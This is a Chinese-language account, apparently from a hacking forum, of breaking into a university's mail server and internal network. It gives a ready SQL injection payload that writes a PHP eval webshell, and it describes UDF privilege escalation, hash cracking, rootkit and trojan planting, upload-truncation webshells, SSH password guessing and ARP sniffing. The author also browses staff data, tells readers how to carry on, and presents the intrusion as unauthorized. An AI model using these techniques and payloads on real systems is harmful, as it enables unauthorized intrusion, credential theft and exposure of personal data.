渗透某大学邮件服务器

一、踩点了
目标mail.xxx.edu.cn,做了CDN，真实IP暂时不知。linux的系统，开了22，直接搞估计是没戏的，只有慢慢从旁渗透了。
第一步，当然是google了，site:xxx.edu.cn inurl:.asp?，然后丢到管中窥豹里面扫了几下，发现几个注点，顺便进后台备份搞下一个SHELL。

二、提权未果，继续找入口（php注入）
SHELL权限限得很死，该禁用的都禁用了，尝试任何方法提权未果，决定放弃这条路。
继续google site:xxx.edu.cn inurl:.aspx? inurl:.php? inurl:.jsp?
等方法，结果在发现一个PHP的注点。
简单测试一下大小写为WINDOWS，加个单引号，发现居然GPC为OFF。这里让人信心大增，拿下这台服务器似乎不远了。

手工探测了下，7个字段，ROOT权限（这下他基本跑不掉了）

这下只要找到目标绝对路径SHELL就到手了哈，开始想load_file WAMP的配置文件的，后来偷了个懒，还是利用咱们的google大叔，呵呵，路径就出来了。
Warning www Site:xxx.edu.cn

最终经过一翻尝试，目标绝对路径为E:wwwjob
直接通过注点导出SHELL
And 1=2 union select 1,2, 0x3C3F70687020406576616C28245F504F53545B2762616F62616F275D293B3F3E,4,5,6,7 from mysql.user into outfile ‘e:/www/www.91ri.org/1.php’—
然后上马，读MYSQL数据配置文件，拿ROOT密码。
由于目标是5.1，所以新建PLUGIN目录导UDF提权成功。

三、内网渗透
经过分析，job这台服务器的IP与目标mail的服务器IP相隔比较远，无法直接进行ARP等攻击。于是破解了本机三个管理员HASH。
并上传asprootkit.asp到www2.xxx.edu.cn的服务器，利用wexxx这个管理员登录，提权成功，为了方便控制，种植上了木马。

在内网破解密码、渗透等一翻XXOO之后，终于找到一台可以从外网直接登入内网的服务器202.xxx.xxx.18，并找到内网对应的MAIL服务器192.168.0.29

同时，还通过密码组合猜测的方式登录了另外一台MAIL的SSH

但目标的密码没有猜出来。
四、ARP未果，渗透员工数据库。
由于是内网IP，并不是公网IP，而且内网没有网关，所以ARP是没有用的，必须还要找到与目标MAIL服务器使用同一个出口网关的服务器才可ARP。于是决定暂时放弃这条路，想通过渗透目标员工数据库找到敏感信息。
通过前期收集的信息对，202.xxx.xxx.1-255进行扫描，发现一个202.xxx.xxx.72上有一个员工管理系统，

通过测试帐号登录后台，上传照片的地方利用字符截断获取WEBSHELL。

进入数据库翻看了几十分钟，感觉太烦，没继续往下看。休息，等第二天再来。
五、直接ARP了。
经过分析，认为从数据库中可能拿不到太有价值的东东，干脆直接ARP了吧，于是又一番XXOO，终于搞到一台与目标MAIL使用同一出口的服务器，直接上CAIN，成功ARP，等RP看密码了。由于比较忙，渗透到此了。

如果娃娃想继续搞的话，可以多收集些信息，目标的SSH多半在某台管理员机子上面。
202.xxx.xxx.138 这台机子上存在密码的可能比较大，不过是台win7的个人机，昨天登录把别人踢下来。呵呵。

本文摘自zczpc2000由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.转载本文请著名原文地址及版权信息。